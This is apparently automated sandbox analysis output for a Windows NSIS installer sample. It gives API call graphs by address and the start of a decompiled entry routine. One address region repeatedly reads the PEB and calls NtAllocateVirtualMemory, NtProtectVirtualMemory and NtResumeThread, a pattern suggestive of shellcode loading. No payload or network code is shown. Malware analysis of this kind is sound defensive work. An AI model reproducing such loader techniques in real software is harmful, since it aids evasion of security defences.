CloseHandle 16738->16740 16741 4061db ReadFile 16739->16741 16740->16729 16742 40638f 16741->16742 16742->16740 16754 4060bd lstrlenA 16742->16754 16745 4063a6 lstrcpyA 16748 4063c8 16745->16748 16746 4063ba 16747 4060bd 4 API calls 16746->16747 16747->16748 16749 4063ff SetFilePointer 16748->16749 16750 40620a WriteFile 16749->16750 16751 406415 GlobalFree 16750->16751 16751->16740 16752->16731 16753->16737 16755 4060fe lstrlenA 16754->16755 16756 406106 16755->16756 16757 4060d7 lstrcmpiA 16755->16757 16756->16745 16756->16746 16757->16756 16758 4060f5 CharNextA 16757->16758 16758->16755 16760 403c90 16759->16760 16761 403c95 FreeLibrary GlobalFree 16760->16761 16762 403c59 16760->16762 16761->16761 16761->16762 16763 405d74 16762->16763 16764 40603f 18 API calls 16763->16764 16765 405d94 16764->16765 16766 405db3 16765->16766 16767 405d9c DeleteFileW 16765->16767 16769 405ede 16766->16769 16803 406668 lstrcpynW 16766->16803 16768 403b71 OleUninitialize 16767->16768 16768->16346 16768->16347 16769->16768 16776 40699e 2 API calls 16769->16776 16771 405dd9 16772 405dec 16771->16772 16773 405ddf lstrcatW 16771->16773 16775 405f83 2 API calls 16772->16775 16774 405df2 16773->16774 16777 405e02 lstrcatW 16774->16777 16778 405df8 16774->16778 16775->16774 16779 405ef8 16776->16779 16780 405e0d lstrlenW FindFirstFileW 16777->16780 16778->16777 16778->16780 16779->16768 16781 405efc 16779->16781 16783 405ed3 16780->16783 16785 405e2f 16780->16785 16782 405f37 3 API calls 16781->16782 16784 405f02 16782->16784 16783->16769 16787 405d2c 5 API calls 16784->16787 16786 405eb6 FindNextFileW 16785->16786 16796 405d74 60 API calls 16785->16796 16798 4056ca 24 API calls 16785->16798 16801 4056ca 24 API calls 16785->16801 16802 406428 36 API calls 16785->16802 16804 406668 lstrcpynW 16785->16804 16805 405d2c 16785->16805 16786->16785 16790 405ecc FindClose 16786->16790 16789 405f0e 16787->16789 16791 405f12 16789->16791 16792 405f28 16789->16792 16790->16783 16791->16768 16795 4056ca 24 API calls 16791->16795 16794 4056ca 24 API calls 16792->16794 16794->16768 16797 405f1f 16795->16797 16796->16785 16799 406428 36 API calls 16797->16799 16798->16786 16800 405f26 16799->16800 16800->16768 16801->16785 16802->16785 16803->16771 16804->16785 16813 406133 GetFileAttributesW 16805->16813 16808 405d59 16808->16785 16809 405d47 RemoveDirectoryW 16811 405d55 16809->16811 16810 405d4f DeleteFileW 16810->16811 16811->16808 16812 405d65 SetFileAttributesW 16811->16812 16812->16808 16814 405d38 16813->16814 16815 406145 SetFileAttributesW 16813->16815 16814->16808 16814->16809 16814->16810 16815->16814 16816 349e6c9 EnumWindows 16817 349e701 16816->16817 16818 349e6a0 16816->16818 16818->16816 16819 401941 16820 401943 16819->16820 16825 402da6 16820->16825 16823 405d74 67 API calls 16824 401951 16823->16824 16826 402db2 16825->16826 16827 4066a5 17 API calls 16826->16827 16828 402dd3 16827->16828 16829 401948 16828->16829 16830 4068ef 5 API calls 16828->16830 16829->16823 16830->16829 16831 4015c1 16832 402da6 17 API calls 16831->16832 16833 4015c8 16832->16833 16834 405fe2 4 API calls 16833->16834 16846 4015d1 16834->16846 16835 401631 16837 401663 16835->16837 16838 401636 16835->16838 16836 405f64 CharNextW 16836->16846 16841 401423 24 API calls 16837->16841 16850 401423 16838->16850 16848 40165b 16841->16848 16843 405c16 2 API calls 16843->16846 16844 405c33 5 API calls 16844->16846 16845 40164a SetCurrentDirectoryW 16845->16848 16846->16835 16846->16836 16846->16843 16846->16844 16847 401617 GetFileAttributesW 16846->16847 16849 405b99 4 API calls 16846->16849 16847->16846 16849->16846 16851 4056ca 24 API calls 16850->16851 16852 401431 16851->16852 16853 406668 lstrcpynW 16852->16853 16853->16845 17303 4015a3 17304 402da6 17 API calls 17303->17304 17305 4015aa SetFileAttributesW 17304->17305 17306 4015bc 17305->17306 16854 34ab4ce 16855 34ab505 16854->16855 16862 34ad350 16855->16862 16857 34ab5b5 16877 34ab74a 16857->16877 16859 34ab5ca 16880 34ade6e 16859->16880 16861 34ade3a 16863 34ad392 16862->16863 16864 349e837 16863->16864 16865 34ad4c5 16863->16865 16866 34ad66d 16863->16866 16873 34a638f 16864->16873 16874 34ac236 16864->16874 16898 34acf3f GetPEB 16864->16898 16889 34ac134 16865->16889 16868 34ad4cb NtAllocateVirtualMemory 16868->16866 16871 34ac229 16900 34ac423 16871->16900 16873->16857 16875 34ac423 GetPEB 16874->16875 16876 34ac3a7 16875->16876 16876->16857 16878 34ab7b0 16877->16878 16879 34ab95e CreateFileA 16878->16879 16879->16859 16882 349e837 16880->16882 16881 34a638f 16881->16861 16882->16881 16883 34acf3f GetPEB 16882->16883 16886 34ac236 16882->16886 16884 34ac229 16883->16884 16885 34ac423 GetPEB 16884->16885 16885->16886 16887 34ac423 GetPEB 16886->16887 16888 34ac3a7 16887->16888 16888->16861 16890 349e837 16889->16890 16890->16889 16891 34acf3f GetPEB 16890->16891 16894 34a638f 16890->16894 16895 34ac236 16890->16895 16892 34ac229 16891->16892 16893 34ac423 GetPEB 16892->16893 16893->16895 16894->16868 16896 34ac423 GetPEB 16895->16896 16897 34ac3a7 16896->16897 16897->16868 16899 34acf53 16898->16899 16899->16871 16901 349e837 16900->16901 16902 34acf3f GetPEB 16901->16902 16905 34a638f 16901->16905 16906 34ac236 16901->16906 16903 34ac229 16902->16903 16904 34ac423 GetPEB 16903->16904 16904->16906 16905->16874 16907 34ac423 GetPEB 16906->16907 16908 34ac3a7 16907->16908 16908->16874 16909 4040c5 16910 4040dd 16909->16910 16911 40423e 16909->16911 16910->16911 16912 4040e9 16910->16912 16913 40428f 16911->16913 16914 40424f GetDlgItem GetDlgItem 16911->16914 16915 4040f4 SetWindowPos 16912->16915 16916 404107 16912->16916 16918 4042e9 16913->16918 16928 401389 2 API calls 16913->16928 16917 4045c4 18 API calls 16914->16917 16915->16916 16920 404110 ShowWindow 16916->16920 16921 404152 16916->16921 16922 404279 SetClassLongW 16917->16922 16919 404610 SendMessageW 16918->16919 16935 404239 16918->16935 16950 4042fb 16919->16950 16923 404130 GetWindowLongW 16920->16923 16924 40422b 16920->16924 16925 404171 16921->16925 16926 40415a DestroyWindow 16921->16926 16927 40140b 2 API calls 16922->16927 16923->16924 16931 404149 ShowWindow 16923->16931 16991 40462b 16924->16991 16932 404176 SetWindowLongW 16925->16932 16933 404187 16925->16933 16981 40454d 16926->16981 16927->16913 16929 4042c1 16928->16929 16929->16918 16934 4042c5 SendMessageW 16929->16934 16931->16921 16932->16935 16933->16924 16938 404193 GetDlgItem 16933->16938 16934->16935 16936 40140b 2 API calls 16936->16950 16937 40454f DestroyWindow EndDialog 16937->16981 16940 4041c1 16938->16940 16941 4041a4 SendMessageW IsWindowEnabled 16938->16941 16939 40457e ShowWindow 16939->16935 16943 4041ce 16940->16943 16944 404215 SendMessageW 16940->16944 16945 4041e1 16940->16945 16955 4041c6 16940->16955 16941->16935 16941->16940 16942 4066a5 17 API calls 16942->16950 16943->16944 16943->16955 16944->16924 16947 4041e9 16945->16947 16948 4041fe 16945->16948 16951 40140b 2 API calls 16947->16951 16952 40140b 2 API calls 16948->16952 16949 4041fc 16949->16924 16950->16935 16950->16936 16950->16937 16950->16942 16953 4045c4 18 API calls 16950->16953 16972 40448f DestroyWindow 16950->16972 16982 4045c4 16950->16982 16951->16955 16954 404205 16952->16954 16953->16950 16954->16924 16954->16955 16988 40459d 16955->16988 16957 404376 GetDlgItem 16958 404393 ShowWindow KiUserCallbackDispatcher 16957->16958 16959 40438b 16957->16959 16985 4045e6 KiUserCallbackDispatcher 16958->16985 16959->16958 16961 4043bd EnableWindow 16966 4043d1 16961->16966 16962 4043d6 GetSystemMenu EnableMenuItem SendMessageW 16963 404406 SendMessageW 16962->16963 16962->16966 16963->16966 16965 4040a6 18 API calls 16965->16966 16966->16962 16966->16965 16986 4045f9 SendMessageW 16966->16986 16987 406668 lstrcpynW 16966->16987 16968 404435 lstrlenW 16969 4066a5 17 API calls 16968->16969 16970 40444b SetWindowTextW 16969->16970 16971 401389 2 API calls 16970->16971 16971->16950 16973 4044a9 CreateDialogParamW 16972->16973 16972->16981 16974 4044dc 16973->16974 16973->16981 16975 4045c4 18 API calls 16974->16975 16976 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 16975->16976 16977 401389 2 API calls 16976->16977 16978 40452d 16977->16978 16978->16935 16979 404535 ShowWindow 16978->16979 16980 404610 SendMessageW 16979->16980 16980->16981 16981->16935 16981->16939 16983 4066a5 17 API calls 16982->16983 16984 4045cf SetDlgItemTextW 16983->16984 16984->16957 16985->16961 16986->16966 16987->16968 16989 4045a4 16988->16989 16990 4045aa SendMessageW 16988->16990 16989->16990 16990->16949 16992 4046ee 16991->16992 16993 404643 GetWindowLongW 16991->16993 16992->16935 16993->16992 16994 404658 16993->16994 16994->16992 16995 404685 GetSysColor 16994->16995 16996 404688 16994->16996 16995->16996 16997 404698 SetBkMode 16996->16997 16998 40468e SetTextColor 16996->16998 16999 4046b0 GetSysColor 16997->16999 17000 4046b6 16997->17000 16998->16997 16999->17000 17001 4046c7 17000->17001 17002 4046bd SetBkColor 17000->17002 17001->16992 17003 4046e1 CreateBrushIndirect 17001->17003 17004 4046da DeleteObject 17001->17004 17002->17001 17003->16992 17004->17003 17307 34ae1ed 17308 34ac134 GetPEB 17307->17308 17309 34ae1ff 17308->17309 17310 34ac134 GetPEB 17309->17310 17311 34ae213 17310->17311 17312 34ae23f GetPEB 17311->17312 17313 34ae2a9 17312->17313 17334 34af025 17313->17334 17315 34aeb31 17315->17315 17316 34ae318 17316->17315 17317 349e837 17316->17317 17321 34aeb34 17316->17321 17330 34ae724 17316->17330 17318 34acf3f GetPEB 17317->17318 17323 34a638f 17317->17323 17324 34ac236 17317->17324 17319 34ac229 17318->17319 17322 34ac423 GetPEB 17319->17322 17320 34aedec 17320->17317 17328 34aee40 17320->17328 17321->17320 17329 34aebfb 17321->17329 17322->17324 17325 34ac423 GetPEB 17324->17325 17327 34ac3a7 17325->17327 17326 34af025 NtProtectVirtualMemory 17326->17315 17328->17326 17331 34af025 NtProtectVirtualMemory 17329->17331 17332 34af025 NtProtectVirtualMemory 17330->17332 17333 34aede9 17331->17333 17332->17315 17335 34af0a8 NtProtectVirtualMemory 17334->17335 17335->17316 17005 405809 17006 4059b3 17005->17006 17007 40582a GetDlgItem GetDlgItem GetDlgItem 17005->17007 17009 4059e4 17006->17009 17010 4059bc GetDlgItem CreateThread CloseHandle 17006->17010 17050 4045f9 SendMessageW 17007->17050 17011 405a0f 17009->17011 17013 405a34 17009->17013 17014 4059fb ShowWindow ShowWindow 17009->17014 17010->17009 17053 40579d 5 API calls 17010->17053 17015 405a6f 17011->17015 17018 405a23 17011->17018 17019 405a49 ShowWindow 17011->17019 17012 40589a 17016 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 17012->17016 17020 40462b 8 API calls 17013->17020 17052 4045f9 SendMessageW 17014->17052 17015->17013 17023 405a7d SendMessageW 17015->17023 17021 4058f3 SendMessageW SendMessageW 17016->17021 17022 40590f 17016->17022 17024 40459d SendMessageW 17018->17024 17026 405a69 17019->17026 17027 405a5b 17019->17027 17025 405a42 17020->17025 17021->17022 17028 405922 17022->17028 17029 405914 SendMessageW 17022->17029 17023->17025 17030 405a96 CreatePopupMenu 17023->17030 17024->17013 17032 40459d SendMessageW 17026->17032 17031 4056ca 24 API calls 17027->17031 17034 4045c4 18 API calls 17028->17034 17029->17028 17033 4066a5 17 API calls 17030->17033 17031->17026 17032->17015 17035 405aa6 AppendMenuW 17033->17035 17036 405932 17034->17036 17037 405ac3 GetWindowRect 17035->17037 17038 405ad6 TrackPopupMenu 17035->17038 17039 40593b ShowWindow 17036->17039 17040 40596f GetDlgItem SendMessageW 17036->17040 17037->17038 17038->17025 17041 405af1 17038->17041 17042 405951 ShowWindow 17039->17042 17043 40595e 17039->17043 17040->17025 17044 405996 SendMessageW SendMessageW 17040->17044 17045 405b0d SendMessageW 17041->17045 17042->17043 17051 4045f9 SendMessageW 17043->17051 17044->17025 17045->17045 17046 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 17045->17046 17048 405b4f SendMessageW 17046->17048 17048->17048 17049 405b78 GlobalUnlock SetClipboardData CloseClipboard 17048->17049 17049->17025 17050->17012 17051->17040 17052->17011 17054 40248a 17055 402da6 17 API calls 17054->17055 17056 40249c 17055->17056 17057 402da6 17 API calls 17056->17057 17058 4024a6 17057->17058 17071 402e36 17058->17071 17061 402c2a 17062 4024de 17063 4024ea 17062->17063 17075 402d84 17062->17075 17066 402509 RegSetValueExW 17063->17066 17068 403371 44 API calls 17063->17068 17064 402da6 17 API calls 17067 4024d4 lstrlenW 17064->17067 17069 40251f RegCloseKey 17066->17069 17067->17062 17068->17066 17069->17061 17072 402e51 17071->17072 17078 406503 17072->17078 17076 4066a5 17 API calls 17075->17076 17077 402d99 17076->17077 17077->17063 17079 406512 17078->17079 17080 4024b6 17079->17080 17081 40651d RegCreateKeyExW 17079->17081 17080->17061 17080->17062 17080->17064 17081->17080 17336 4021aa 17337 402da6 17 API calls 17336->17337 17338 4021b1 17337->17338 17339 402da6 17 API calls 17338->17339 17340 4021bb 17339->17340 17341 402da6 17 API calls 17340->17341 17342 4021c5 17341->17342 17343 402da6 17 API calls 17342->17343 17344 4021cf 17343->17344 17345 402da6 17 API calls 17344->17345 17346 4021d9 17345->17346 17347 402218 CoCreateInstance 17346->17347 17348 402da6 17 API calls 17346->17348 17351 402237 17347->17351 17348->17347 17349 401423 24 API calls 17350 4022f6 17349->17350 17351->17349 17351->17350 17082 405c8e ShellExecuteExW 17352 40176f 17353 402da6 17 API calls 17352->17353 17354 401776 17353->17354 17355 401796 17354->17355 17356 40179e 17354->17356 17391 406668 lstrcpynW 17355->17391 17392 406668 lstrcpynW 17356->17392 17359 40179c 17363 4068ef 5 API calls 17359->17363 17360 4017a9 17361 405f37 3 API calls 17360->17361 17362 4017af lstrcatW 17361->17362 17362->17359 17368 4017bb 17363->17368 17364 40699e 2 API calls 17364->17368 17365 406133 2 API calls 17365->17368 17367 4017cd CompareFileTime 17367->17368 17368->17364 17368->17365 17368->17367 17369 40188d 17368->17369 17372 406668 lstrcpynW 17368->17372 17378 4066a5 17 API calls 17368->17378 17384 405cc8 MessageBoxIndirectW 17368->17384 17387 401864 17368->17387 17390 406158 GetFileAttributesW CreateFileW 17368->17390 17370 4056ca 24 API calls 17369->17370 17373 401897 17370->17373 17371 4056ca 24 API calls 17389 401879 17371->17389 17372->17368 17374 403371 44 API calls 17373->17374 17375 4018aa 17374->17375 17376 4018be SetFileTime 17375->17376 17377 4018d0 CloseHandle 17375->17377 17376->17377 17379 4018e1 17377->17379 17377->17389 17378->17368 17380 4018e6 17379->17380 17381 4018f9 17379->17381 17382 4066a5 17 API calls 17380->17382 17383 4066a5 17 API calls 17381->17383 17385 4018ee lstrcatW 17382->17385 17386 401901 17383->17386 17384->17368 17385->17386 17388 405cc8 MessageBoxIndirectW 17386->17388 17387->17371 17387->17389 17388->17389 17390->17368 17391->17359 17392->17360 17393 4023b2 17394 4023ba 17393->17394 17397 4023c0 17393->17397 17395 402da6 17 API calls 17394->17395 17395->17397 17396 4023ce 17398 4023dc 17396->17398 17400 402da6 17 API calls 17396->17400 17397->17396 17399 402da6 17 API calls 17397->17399 17401 402da6 17 API calls 17398->17401 17399->17396 17400->17398 17402 4023e5 WritePrivateProfileStringW 17401->17402 17403 402434 17404 402467 17403->17404 17405 40243c 17403->17405 17407 402da6 17 API calls 17404->17407 17406 402de6 17 API calls 17405->17406 17408 402443 17406->17408 17409 40246e 17407->17409 17410 40244d 17408->17410 17413 40247b 17408->17413 17415 402e64 17409->17415 17412 402da6 17 API calls 17410->17412 17414 402454 RegDeleteValueW RegCloseKey 17412->17414 17414->17413 17416 402e71 17415->17416 17417 402e78 17415->17417 17416->17413 17417->17416 17419 402ea9 17417->17419 17420 4064d5 RegOpenKeyExW 17419->17420 17421 402ed7 17420->17421 17422 402ee1 17421->17422 17423 402f8c 17421->17423 17424 402ee7 RegEnumValueW 17422->17424 17431 402f0a 17422->17431 17423->17416 17425 402f71 RegCloseKey 17424->17425 17424->17431 17425->17423 17426 402f46 RegEnumKeyW 17427 402f4f RegCloseKey 17426->17427 17426->17431 17428 406a35 5 API calls 17427->17428 17430 402f5f 17428->17430 17429 402ea9 6 API calls 17429->17431 17432 402f81 17430->17432 17433 402f63 RegDeleteKeyW 17430->17433 17431->17425 17431->17426 17431->17427 17431->17429 17432->17423 17433->17423 17434 34a03be 17437 34a1e2e 17434->17437 17438 34af210 17437->17438 17439 34a03c3 17438->17439 17442 34af29a 17438->17442 17441 34af31a 17443 34af2df 17442->17443 17446 34af29d 17443->17446 17445 34af2e4 17445->17441 17447 34af2d5 17446->17447 17448 349e837 17446->17448 17449 34acf3f GetPEB 17448->17449 17452 34a638f 17448->17452 17453 34ac236 17448->17453 17450 34ac229 17449->17450 17451 34ac423 GetPEB 17450->17451 17451->17453 17452->17445 17454 34ac423 GetPEB 17453->17454 17455 34ac3a7 17454->17455 17455->17445 17083 4020d8 17084 4020ea 17083->17084 17094 40219c 17083->17094 17085 402da6 17 API calls 17084->17085 17086 4020f1 17085->17086 17088 402da6 17 API calls 17086->17088 17087 401423 24 API calls 17092 4022f6 17087->17092 17089 4020fa 17088->17089 17090 402110 LoadLibraryExW 17089->17090 17091 402102 GetModuleHandleW 17089->17091 17093 402121 17090->17093 17090->17094 17091->17090 17091->17093 17106 406aa4 17093->17106 17094->17087 17097 402132 17100 402151 17097->17100 17101 40213a 17097->17101 17098 40216b 17099 4056ca 24 API calls 17098->17099 17102 402142 17099->17102 17111 71461817 17100->17111 17103 401423 24 API calls 17101->17103 17102->17092 17104 40218e FreeLibrary 17102->17104 17103->17102 17104->17092 17153 40668a WideCharToMultiByte 17106->17153 17108 406ac1 17109 406ac8 GetProcAddress 17108->17109 17110 40212c 17108->17110 17109->17110 17110->17097 17110->17098 17112 7146184a 17111->17112 17154 71461bff 17112->17154 17114 71461851 17115 71461976 17114->17115 17116 71461862 17114->17116 17117 71461869 17114->17117 17115->17102 17200 7146243e 17116->17200 17186 71462480 17117->17186 17122 714618af 17213 71462655 17122->17213 17123 714618cd 17126 714618d3 17123->17126 17127 7146191e 17123->17127 17124 7146187f 17129 71461885 17124->17129 17134 71461890 17124->17134 17125 71461898 17136 7146188e 17125->17136 17210 71462e23 17125->17210 17232 71461666 17126->17232 17132 71462655 10 API calls 17127->17132 17129->17136 17196 71462b98 17129->17196 17139 7146190f 17132->17139 17133 714618b5 17224 71461654 17133->17224 17204 71462810 17134->17204 17136->17122 17136->17123 17144 71461965 17139->17144 17238 71462618 17139->17238 17141 71461896 17141->17136 17142 71462655 10 API calls 17142->17139 17144->17115 17147 7146196f GlobalFree 17144->17147 17147->17115 17150 71461951 17150->17144 17242 714615dd wsprintfW 17150->17242 17151 7146194a FreeLibrary 17151->17150 17153->17108 17245 714612bb GlobalAlloc 17154->17245 17156 71461c26 17246 714612bb GlobalAlloc 17156->17246 17158 71461e6b GlobalFree GlobalFree GlobalFree 17159 71461e88 17158->17159 17172 71461ed2 17158->17172 17161 7146227e 17159->17161 17169 71461e9d 17159->17169 17159->17172 17160 71461d26 GlobalAlloc 17176 71461c31 17160->17176 17162 714622a0 GetModuleHandleW 17161->17162 17161->17172 17163 714622c6 17162->17163 17164 714622b1 LoadLibraryW 17162->17164 17253 714616bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 17163->17253 17164->17163 17164->17172 17165 71461d71 lstrcpyW 17168 71461d7b lstrcpyW 17165->17168 17166 71461d8f GlobalFree 17166->17176 17168->17176 17169->17172 17249 714612cc 17169->17249 17170 71462318 17170->17172 17175 71462325 lstrlenW 17170->17175 17171 71462126 17252 714612bb GlobalAlloc 17171->17252 17172->17114 17254 714616bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 17175->17254 17176->17158 17176->17160 17176->17165 17176->17166 17176->17168 17176->17171 17176->17172 17177 71462067 GlobalFree 17176->17177 17178 714621ae 17176->17178 17181 714612cc 2 API calls 17176->17181 17247 7146162f GlobalSize GlobalAlloc 17176->17247 17177->17176 17178->17172 17183 71462216 lstrcpyW 17178->17183 17179 714622d8 17179->17170 17184 71462302 GetProcAddress 17179->17184 17181->17176 17183->17172 17184->17170 17185 7146212f 17185->17114 17188 71462498 17186->17188 17187 714612cc GlobalAlloc lstrcpynW 17187->17188 17188->17187 17190 714625c1 GlobalFree 17188->17190 17191 71462540 GlobalAlloc WideCharToMultiByte 17188->17191 17192 7146256b GlobalAlloc CLSIDFromString 17188->17192 17195 7146258a 17188->17195 17256 7146135a 17188->17256 17190->17188 17193 7146186f 17190->17193 17191->17190 17192->17190 17193->17124 17193->17125 17193->17136 17195->17190 17260 714627a4 17195->17260 17199 71462baa 17196->17199 17198 71462d39 17198->17136 17263 71462b42 17199->17263 17201 71462453 17200->17201 17202 7146245e GlobalAlloc 17201->17202 17203 71461868 17201->17203 17202->17201 17203->17117 17208 71462840 17204->17208 17205 714628ee 17207 714628f4 GlobalSize 17205->17207 17209 714628fe 17205->17209 17206 714628db GlobalAlloc 17206->17209 17207->17209 17208->17205 17208->17206 17209->17141 17211 71462e2e 17210->17211 17212 71462e6e GlobalFree 17211->17212 17267 714612bb GlobalAlloc 17213->17267 17215 714626fa StringFromGUID2 17222 7146265f 17215->17222 17216 7146270b lstrcpynW 17216->17222 17217 714626d8 MultiByteToWideChar 17217->17222 17218 7146271e wsprintfW 17218->17222 17219 71462742 GlobalFree 17219->17222 17220 71462777 GlobalFree 17220->17133 17221 71461312 2 API calls 17221->17222 17222->17215 17222->17216 17222->17217 17222->17218 17222->17219 17222->17220 17222->17221 17268 71461381 17222->17268 17272 714612bb GlobalAlloc 17224->17272 17226 71461659 17227 71461666 2 API calls 17226->17227 17228 71461663 17227->17228 17229 71461312 17228->17229 17230 71461355 GlobalFree 17229->17230 17231 7146131b GlobalAlloc lstrcpynW 17229->17231 17230->17139 17231->17230 17233 7146169f lstrcpyW 17232->17233 17234 71461672 wsprintfW 17232->17234 17237 714616b8 17233->17237 17234->17237 17237->17142 17239 71462626 17238->17239 17240 71461931 17238->17240 17239->17240 17241 71462642 GlobalFree 17239->17241 17240->17150 17240->17151 17241->17239 17243 71461312 2 API calls 17242->17243 17244 714615fe 17243->17244 17244->17144 17245->17156 17246->17176 17248 7146164d 17247->17248 17248->17176 17255 714612bb GlobalAlloc 17249->17255 17251 714612db lstrcpynW 17251->17172 17252->17185 17253->17179 17254->17172 17255->17251 17257 71461361 17256->17257 17258 714612cc 2 API calls 17257->17258 17259 7146137f 17258->17259 17259->17188 17261 714627b2 VirtualAlloc 17260->17261 17262 71462808 17260->17262 17261->17262 17262->17195 17264 71462b4d 17263->17264 17265 71462b52 GetLastError 17264->17265 17266 71462b5d 17264->17266 17265->17266 17266->17198 17267->17222 17269 714613ac 17268->17269 17270 7146138a 17268->17270 17269->17222 17270->17269 17271 71461390 lstrcpyW 17270->17271 17271->17269 17272->17226 17456 71462a7f 17457 71462acf 17456->17457 17458 71462a8f VirtualProtect 17456->17458 17458->17457 17273 40175c 17274 402da6 17 API calls 17273->17274 17275 401763 17274->17275 17276 406187 2 API calls 17275->17276 17277 40176a 17276->17277 17278 406187 2 API calls 17277->17278 17278->17277 17279 401ede 17280 402d84 17 API calls 17279->17280 17281 401ee4 17280->17281 17282 402d84 17 API calls 17281->17282 17283 401ef0 17282->17283 17284 401f07 EnableWindow 17283->17284 17285 401efc ShowWindow 17283->17285 17286 402c2a 17284->17286 17285->17286 17287 40259e 17298 402de6 17287->17298 17290 402d84 17 API calls 17291 4025b1 17290->17291 17292 4025d9 RegEnumValueW 17291->17292 17293 4025cd RegEnumKeyW 17291->17293 17294 40292e 17291->17294 17295 4025f5 RegCloseKey 17292->17295 17296 4025ee 17292->17296 17293->17295 17295->17294 17296->17295 17299 402da6 17 API calls 17298->17299 17300 402dfd 17299->17300 17301 4064d5 RegOpenKeyExW 17300->17301 17302 4025a8 17301->17302 17302->17290 17459 34afe74 17461 34afe79 17459->17461 17462 34afeb3 17461->17462 17463 34a638f 17462->17463 17464 34b007f NtResumeThread 17462->17464 17465 34b00d0 17464->17465

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 12 403727 5->12 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 12->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 26 40376f 21->26 26->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 39 403810-403814 36->39 40 403815-403819 36->40 44 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->44 45 40397d-403995 DeleteFileW call 4030d0 37->45 39->40 42 4038d9-4038e7 call 405f64 40->42 43 40381f-403825 40->43 42->32 61 4038e9-4038ea 42->61 47 403827-40382e 43->47 48 40383f-403878 43->48 44->45 64 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 44->64 66 40399b-4039a1 45->66 67 403b6c-403b7a call 403c25 OleUninitialize 45->67 54 403830-403833 47->54 55 403835 47->55 49 403894-4038ce 48->49 50 40387a-40387f 48->50 58 4038d0-4038d4 49->58 59 4038d6-4038d8 49->59 50->49 56 403881-403889 50->56 54->48 54->55 55->48 62 403890 56->62 63 40388b-40388e 56->63 58->59 65 4038f9-403906 call 406668 58->65 59->42 61->32 62->49 63->49 63->62 64->45 64->67 65->37 70 4039a7-4039ba call 405f64 66->70 71 403a48-403a4f call 403d17 66->71 77 403b91-403b97 67->77 78 403b7c-403b8b call 405cc8 ExitProcess 67->78 84 403a0c-403a19 70->84 85 4039bc-4039f1 70->85 80 403a54-403a57 71->80 82 403b99-403bae GetCurrentProcess OpenProcessToken 77->82 83 403c0f-403c17 77->83 80->67 92 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 82->92 93 403bdf-403bed call 406a35 82->93 87 403c19 83->87 88 403c1c-403c1f ExitProcess 83->88 89 403a1b-403a29 call 40603f 84->89 90 403a5c-403a70 call 405c33 lstrcatW 84->90 86 4039f3-4039f7 85->86 94 403a00-403a08 86->94 95 4039f9-4039fe 86->95 87->88 89->67 105 403a2f-403a45 call 406668 * 2 89->105 103 403a72-403a78 lstrcatW 90->103 104 403a7d-403a97 lstrcatW lstrcmpiW 90->104 92->93 106 403bfb-403c06 ExitWindowsEx 93->106 107 403bef-403bf9 93->107 94->86 99 403a0a 94->99 95->94 95->99 99->84 103->104 109 403b6a 104->109 110 403a9d-403aa0 104->110 105->71 106->83 108 403c08-403c0a call 40140b 106->108 107->106 107->108 108->83 109->67 113 403aa2-403aa7 call 405b99 110->113 114 403aa9 call 405c16 110->114 121 403aae-403abe SetCurrentDirectoryW 113->121 114->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 134 403b63-403b65 call 406428 131->134 132->131 133 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->133 133->131 142 403b4d-403b54 CloseHandle 133->142 134->109 142->131
                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			_entry_() {
                                                                                                                          				WCHAR* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				int _v24;
                                                                                                                          				int _v28;
                                                                                                                          				struct _TOKEN_PRIVILEGES _v40;
                                                                                                                          				signed char _v42;
                                                                                                                          				int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				intOrPtr _v278;
                                                                                                                          				signed short _v310;
                                                                                                                          				struct _OSVERSIONINFOW _v324;
                                                                                                                          				struct _SHFILEINFOW _v1016;
                                                                                                                          				intOrPtr* _t88;
                                                                                                                          				WCHAR* _t92;
                                                                                                                          				char* _t94;
                                                                                                                          				void _t97;
                                                                                                                          				void* _t116;
                                                                                                                          				WCHAR* _t118;
                                                                                                                          				signed int _t120;
                                                                                                                          				intOrPtr* _t124;
                                                                                                                          				void* _t138;
                                                                                                                          				void* _t144;
                                                                                                                          				void* _t149;
                                                                                                                          				void* _t153;
                                                                                                                          				void* _t158;
                                                                                                                          				signed int _t168;
                                                                                                                          				void* _t171;
                                                                                                                          				void* _t176;
                                                                                                                          				intOrPtr _t178;
                                                                                                                          				intOrPtr _t179;
                                                                                                                          				intOrPtr* _t180;
                                                                                                                          				int _t189;
                                                                                                                          				void* _t190;
                                                                                                                          				void* _t199;
                                                                                                                          				signed int _t205;
                                                                                                                          				signed int _t210;
                                                                                                                          				signed int _t215;
                                                                                                                          				signed int _t217;
                                                                                                                          				int* _t219;
                                                                                                                          				signed int _t227;
                                                                                                                          				signed int _t230;
                                                                                                                          				CHAR* _t232;
                                                                                                                          				char* _t233;
                                                                                                                          				signed int _t234;
                                                                                                                          				WCHAR* _t235;
                                                                                                                          				void* _t251;
